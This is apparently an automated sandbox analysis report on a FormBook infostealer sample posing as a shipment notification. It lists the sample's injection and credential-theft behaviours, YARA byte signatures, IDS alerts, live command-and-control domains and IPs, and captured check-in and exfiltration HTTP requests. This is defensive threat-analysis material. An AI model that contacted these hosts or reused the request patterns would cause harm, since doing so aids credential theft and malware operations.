Windows Analysis Report
Shipment_notification.exe

Overview

General Information

Sample Name:Shipment_notification.exe
Analysis ID:830738
MD5:c310a64af890ac32abff89e86cb53a33
SHA1:509cdec4d058011fb55535a936e56d3158f3f05a
SHA256:90e86051c2fb04a3f6fda85273580abca9a9131fb5e32065f620c4410febe1af
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Deletes itself after installation
Modifies the context of a thread in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • Shipment_notification.exe (PID: 1348 cmdline: C:\Users\user\Desktop\Shipment_notification.exe MD5: C310A64AF890AC32ABFF89E86CB53A33)
    • Shipment_notification.exe (PID: 2344 cmdline: C:\Users\user\Desktop\Shipment_notification.exe MD5: C310A64AF890AC32ABFF89E86CB53A33)
    • Shipment_notification.exe (PID: 3968 cmdline: C:\Users\user\Desktop\Shipment_notification.exe MD5: C310A64AF890AC32ABFF89E86CB53A33)
      • explorer.exe (PID: 3324 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • control.exe (PID: 4412 cmdline: C:\Windows\SysWOW64\control.exe MD5: 40FBA3FBFD5E33E0DE1BA45472FDA66F)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000002.00000002.377445989.0000000001510000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
    00000002.00000002.377445989.0000000001510000.00000040.10000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
    • 0x1f0d0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0xae3f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x182e7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
    00000002.00000002.377445989.0000000001510000.00000040.10000000.00040000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x180e5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x17b81:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x181e7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1835f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xaa0a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x16dcc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x1de77:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ee2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
      00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
      • 0x20e53:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xcbc2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x1a06a:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      Source | Rule | Description | Author | Strings
      2.2.Shipment_notification.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
        2.2.Shipment_notification.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
        • 0x20053:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0xbdc2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        • 0x1926a:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
        2.2.Shipment_notification.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x19068:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x18b04:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x1916a:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x192e2:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xb98d:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x17d4f:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x1edfa:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1fdad:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        2.2.Shipment_notification.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
          2.2.Shipment_notification.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
          • 0x20e53:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0xcbc2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x1a06a:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          No Sigma rule has matched
          Timestamp:03/20/23-16:50:29.247456
          Source IP:192.168.2.5
          Destination IP:198.177.124.57
          SID:2031453
          Source Port:49706
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:03/20/23-16:50:05.917395
          Source IP:192.168.2.5
          Destination IP:199.59.243.223
          SID:2031453
          Source Port:49702
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:03/20/23-16:50:29.247456
          Source IP:192.168.2.5
          Destination IP:198.177.124.57
          SID:2031412
          Source Port:49706
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:03/20/23-16:50:21.020230
          Source IP:192.168.2.5
          Destination IP:154.218.155.8
          SID:2031453
          Source Port:49704
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:03/20/23-16:50:29.247456
          Source IP:192.168.2.5
          Destination IP:198.177.124.57
          SID:2031449
          Source Port:49706
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:03/20/23-16:50:21.020230
          Source IP:192.168.2.5
          Destination IP:154.218.155.8
          SID:2031412
          Source Port:49704
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:03/20/23-16:50:05.917395
          Source IP:192.168.2.5
          Destination IP:199.59.243.223
          SID:2031449
          Source Port:49702
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:03/20/23-16:50:21.020230
          Source IP:192.168.2.5
          Destination IP:154.218.155.8
          SID:2031449
          Source Port:49704
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:03/20/23-16:50:05.917395
          Source IP:192.168.2.5
          Destination IP:199.59.243.223
          SID:2031412
          Source Port:49702
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          AV Detection

          Source: Shipment_notification.exe | ReversingLabs: Detection: 39%
          Source: Shipment_notification.exe | Virustotal: Detection: 43%
          Source: Yara match | File source: 2.2.Shipment_notification.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.Shipment_notification.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000002.00000002.377445989.0000000001510000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.580922850.0000000003170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.578168386.0000000002E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.577613473.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: http://www.searchvity.com/?dn= | URL Reputation: Label: malware
          Source: http://www.ywtxsm.com/rs5b/Pr | Avira URL Cloud: Label: malware
          Source: http://www.searchvity.com/ | URL Reputation: Label: malware
          Source: http://www.peramid.xyz/rs5b/?uyxvg=pPgXS4BiopaVkxB77nB8m5BmJKRgxbtyTgQ51TCNvvWiqwh2ZJ0SiqT/1xVf5TTVOW5skWvYLryZyUzfOZLrBqpWBEotOTgmwg==&L6HRe=HinkmsLDjhA | Avira URL Cloud: Label: malware
          Source: http://www.isabellagambitta.com/rs5b/?uyxvg=CsXC0bU6YgbK4v/ikU | Avira URL Cloud: Label: phishing
          Source: http://www.drkathleensanders.com/rs5b/ | Avira URL Cloud: Label: malware
          Source: http://www.peramid.xyz/rs5b/ | Avira URL Cloud: Label: malware
          Source: http://www.piergitarshoes.com/rs5b/ | Avira URL Cloud: Label: malware
          Source: http://www.amirah.cfd | Avira URL Cloud: Label: phishing
          Source: http://www.amirah.cfd/rs5b/ | Avira URL Cloud: Label: malware
          Source: http://www.ywtxsm.com/rs5b/ | Avira URL Cloud: Label: malware
          Source: http://www.locationsbormes.com/rs5b/?uyxvg=5nmvRd2KsNrJ1ILohWvWv9G51OYC+JQySj/wVW5HrbzlASqN8826SlrC1uxl2FZ0KA9XHqewj3KetP3L0XT9wGstOg81NIph5g==&L6HRe=HinkmsLDjhA | Avira URL Cloud: Label: malware
          Source: http://www.isabellagambitta.com/rs5b/?uyxvg=CsXC0bU6YgbK4v/ikU+FR3ZDcTynpB6gZNcuxnLmHu8DrupdLy2Rvx2rp5ka04f5VlwEigsTcDnoyRb/ht4uYCIEoQzcZzfMnw==&L6HRe=HinkmsLDjhA | Avira URL Cloud: Label: phishing
          Source: http://www.isabellagambitta.com/rs5b/ | Avira URL Cloud: Label: phishing
          Source: http://www.ywtxsm.com/rs5b/?uyxvg=CESO3iylK7QUfFCiUFLwHXxmSIHW1gBrGCjGxLpE4g3q3SI6yIOiTvn7qrQa9OdkrAgYihNybI2hWOHGXNYRIortSIS8Lcg0Kg==&L6HRe=HinkmsLDjhA | Avira URL Cloud: Label: malware
          Source: http://www.peramid.xyz | Avira URL Cloud: Label: malware
          Source: http://www.53876.world | Avira URL Cloud: Label: malware
          Source: http://www.drkathleensanders.com/rs5b/?uyxvg=Sr3AwP9Ski0v59cQ3JwcPDLo9I+EFZxtPOrHknZVg/8QV/fIqaYOT5hsTQMwMe6TSfps7iDWaOg2o/5pI6PYy1hDK243b9ADKw==&L6HRe=HinkmsLDjhA | Avira URL Cloud: Label: malware
          Source: http://www.53876.world/rs5b/ | Avira URL Cloud: Label: malware
          Source: http://www.locationsbormes.com/rs5b/ | Avira URL Cloud: Label: malware
          Source: http://www.carcosainvest.com/rs5b/ | Avira URL Cloud: Label: malware
          Source: Shipment_notification.exe | Joe Sandbox ML: detected
          Source: 2.2.Shipment_notification.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
          Source: Shipment_notification.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: Shipment_notification.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: CYYO.pdb source: Shipment_notification.exe
          Source: Binary string: wntdll.pdbUGP source: Shipment_notification.exe, 00000002.00000003.336325695.0000000001924000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000002.00000003.333262180.0000000001790000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000002.581558007.0000000004C0F000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000003.377463775.00000000047C0000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000004.00000002.581558007.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000003.379237530.0000000004950000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: control.pdb source: Shipment_notification.exe, 00000002.00000002.378125022.0000000001A80000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: Shipment_notification.exe, Shipment_notification.exe, 00000002.00000003.336325695.0000000001924000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000002.00000003.333262180.0000000001790000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000002.581558007.0000000004C0F000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000003.377463775.00000000047C0000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000004.00000002.581558007.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000003.379237530.0000000004950000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: CYYO.pdbSHA256 source: Shipment_notification.exe
          Source: Binary string: control.pdbUGP source: Shipment_notification.exe, 00000002.00000002.378125022.0000000001A80000.00000040.10000000.00040000.00000000.sdmp

          Networking

          Source: C:\Windows\explorer.exe | Network Connect: 206.54.190.30 80
          Source: C:\Windows\explorer.exe | Network Connect: 154.218.155.8 80
          Source: C:\Windows\explorer.exe | Domain query: www.tcatelier.com
          Source: C:\Windows\explorer.exe | Network Connect: 199.59.243.223 80
          Source: C:\Windows\explorer.exe | Network Connect: 45.114.105.2 80
          Source: C:\Windows\explorer.exe | Domain query: www.carcosainvest.com
          Source: C:\Windows\explorer.exe | Domain query: www.locationsbormes.com
          Source: C:\Windows\explorer.exe | Domain query: www.peramid.xyz
          Source: C:\Windows\explorer.exe | Network Connect: 198.177.124.57 80
          Source: C:\Windows\explorer.exe | Domain query: www.piergitarshoes.com
          Source: C:\Windows\explorer.exe | Domain query: www.emagrecarapido.store
          Source: C:\Windows\explorer.exe | Domain query: www.isabellagambitta.com
          Source: C:\Windows\explorer.exe | Network Connect: 185.27.134.217 80
          Source: C:\Windows\explorer.exe | Network Connect: 66.96.161.158 80
          Source: C:\Windows\explorer.exe | Domain query: www.ywtxsm.com
          Source: C:\Windows\explorer.exe | Domain query: www.amirah.cfd
          Source: C:\Windows\explorer.exe | Domain query: www.drkathleensanders.com
          Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49702 -> 199.59.243.223:80
          Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49702 -> 199.59.243.223:80
          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49702 -> 199.59.243.223:80
          Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49704 -> 154.218.155.8:80
          Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49704 -> 154.218.155.8:80
          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49704 -> 154.218.155.8:80
          Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49706 -> 198.177.124.57:80
          Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49706 -> 198.177.124.57:80
          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49706 -> 198.177.124.57:80
          Source: C:\Windows\explorer.exe | DNS query: www.peramid.xyz
          Source: Joe Sandbox View | ASN Name: FINALFRONTIERVG FINALFRONTIERVG
          Source: Joe Sandbox View | ASN Name: WZCOM-US WZCOM-US
          Source: global traffic | HTTP traffic detected: GET /rs5b/?uyxvg=CsXC0bU6YgbK4v/ikU+FR3ZDcTynpB6gZNcuxnLmHu8DrupdLy2Rvx2rp5ka04f5VlwEigsTcDnoyRb/ht4uYCIEoQzcZzfMnw==&L6HRe=HinkmsLDjhA HTTP/1.1 | Host: www.isabellagambitta.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /rs5b/?uyxvg=Sr3AwP9Ski0v59cQ3JwcPDLo9I+EFZxtPOrHknZVg/8QV/fIqaYOT5hsTQMwMe6TSfps7iDWaOg2o/5pI6PYy1hDK243b9ADKw==&L6HRe=HinkmsLDjhA HTTP/1.1 | Host: www.drkathleensanders.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /rs5b/?uyxvg=nOUSwineJuxPGPhQvt4EE68jEsCX+f+F3Zzf53EwbVXghGVs+qBfV9lnV789trdHPD+OYXwXTJgtqB6myIQJ1SqB2q7gB4Y0Vw==&L6HRe=HinkmsLDjhA HTTP/1.1 | Host: www.carcosainvest.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /rs5b/?uyxvg=zhbsihX/pGFJaZpy6dND3H78PJ7JxpKHxXOuen1DNaNorGCumHf7SvafvJLlAK1tbLNpDx0WdS8kjnRSnmRz/gORsH5hLjUWLg==&L6HRe=HinkmsLDjhA HTTP/1.1 | Host: www.piergitarshoes.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /rs5b/?uyxvg=CESO3iylK7QUfFCiUFLwHXxmSIHW1gBrGCjGxLpE4g3q3SI6yIOiTvn7qrQa9OdkrAgYihNybI2hWOHGXNYRIortSIS8Lcg0Kg==&L6HRe=HinkmsLDjhA HTTP/1.1 | Host: www.ywtxsm.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /rs5b/?uyxvg=pPgXS4BiopaVkxB77nB8m5BmJKRgxbtyTgQ51TCNvvWiqwh2ZJ0SiqT/1xVf5TTVOW5skWvYLryZyUzfOZLrBqpWBEotOTgmwg==&L6HRe=HinkmsLDjhA HTTP/1.1 | Host: www.peramid.xyz | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /rs5b/?uyxvg=5nmvRd2KsNrJ1ILohWvWv9G51OYC+JQySj/wVW5HrbzlASqN8826SlrC1uxl2FZ0KA9XHqewj3KetP3L0XT9wGstOg81NIph5g==&L6HRe=HinkmsLDjhA HTTP/1.1 | Host: www.locationsbormes.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: POST /rs5b/ HTTP/1.1 | Host: www.drkathleensanders.com | Connection: close | Content-Length: 187 | Cache-Control: no-cache | Origin: http://www.drkathleensanders.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.drkathleensanders.com/rs5b/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate | Data Ascii: uyxvg=fpfgz4NCsHlh~ecuwJtddhPm2bPQPbRNBszAhD5GvP4Zcu7jlbF7U8gnbD0mBZ~ALecRyCXeNt4kl9lwUK7AuV5XfkwQeu0aCziesSGNfhz4nCaVN0Cmuc9V~2nM7KKD~eygnsmMwXhwGKhe3KGrRxICZI~kMrCMlCsz27YC(tX5IDe8CA).
          Source: global traffic | HTTP traffic detected: POST /rs5b/ HTTP/1.1 | Host: www.carcosainvest.com | Connection: close | Content-Length: 187 | Cache-Control: no-cache | Origin: http://www.carcosainvest.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.carcosainvest.com/rs5b/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate | Data Ascii: uyxvg=qM8yzWTwUJABL9JYk-8DZ4M_TfyE88~D7s7N~EcZXkXkp31l~L5vU9dzKKAQppBEITr5eTAPTr05gD2MvbI7rAWCoJjiU-8RTOML~4WSNJszqul0HLeo3_CQfi(Qcs5zpXYI7wyFwJrdeq(S2aW_wVcq68FwEFWNggR_eTjdlV9MynGPIg).
          Source: global traffic | HTTP traffic detected: POST /rs5b/ HTTP/1.1 | Host: www.piergitarshoes.com | Connection: close | Content-Length: 187 | Cache-Control: no-cache | Origin: http://www.piergitarshoes.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.piergitarshoes.com/rs5b/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate | Data Ascii: uyxvg=~jzMhUSB1SlKX4pf6rc3qnTMIIaY~o~AiFG5eEJTDbFt9EKl33vuMsfUv7baDap2MLYPCQQ_Lig1sC1w0DtunzOrp2hJFioMLK4FKxHOQqmJl4DOQyFbmNg_4QP3GyqY7OhjIY94BzZLqj1dQ34HOi9DFoYr8wWT(4mQQwzbqsn7jzJY5g).
          Source: global traffic | HTTP traffic detected: POST /rs5b/ HTTP/1.1 | Host: www.ywtxsm.com | Connection: close | Content-Length: 187 | Cache-Control: no-cache | Origin: http://www.ywtxsm.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.ywtxsm.com/rs5b/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate | Data Ascii: uyxvg=PG6u0UC7QNRVS2GJeE6TdHVKQcLm8iF5Khrh4p5X1h7zyQ0L(5jMVf(jtZUU2Y599Blwvh5SaY2zZsDKW9ZIZLXTMpnveuIHTIfPV3YN8fbaBmL2OENwiiiXMN4MxZnh0lb5rm9y1kVls0yiwcaAKT6yYxjBBRmQwIHdrw7CBsXA40rXfQ).
          Source: global traffic | HTTP traffic detected: POST /rs5b/ HTTP/1.1 | Host: www.peramid.xyz | Connection: close | Content-Length: 187 | Cache-Control: no-cache | Origin: http://www.peramid.xyz | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.peramid.xyz/rs5b/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate | Data Ascii: uyxvg=kNI3RMRPr-2GhBJV7kQv8el0Frswyap8WVUo8wmcptqnjE5AROEZtq7FtTNI(xDUalspn3(7VpayzljXYrL0Q5FzSmIsNxU_7-V4L6q6sapy2OeW2tFWfzZnVPMURuDA~PeL4atwnR1KyAcqj2wgWD8uCoXo3M~DAEbs7FiEheTuffTLOw).
          Source: global traffic | HTTP traffic detected: POST /rs5b/ HTTP/1.1 | Host: www.locationsbormes.com | Connection: close | Content-Length: 187 | Cache-Control: no-cache | Origin: http://www.locationsbormes.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.locationsbormes.com/rs5b/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate | Data Ascii: uyxvg=0lOPSpK_v5Pbk7(0gROWyeya7OgDyeYcWnXoVC5SvrvhNBa70LKWaX7z2cx21iBwYR5SO_rp6XqPhNCzinPAoVEaRAIwY-BT4AyBdr9fjjTRPemxUH~oNGK7ZIwbRhQ0~yaaB_wvA2gqBe4wfjpt~Ec1m4YXKLtP98yUPuWNrUzRESV3tA).
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 15:49:47 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: Apache/2Last-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 
74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%;
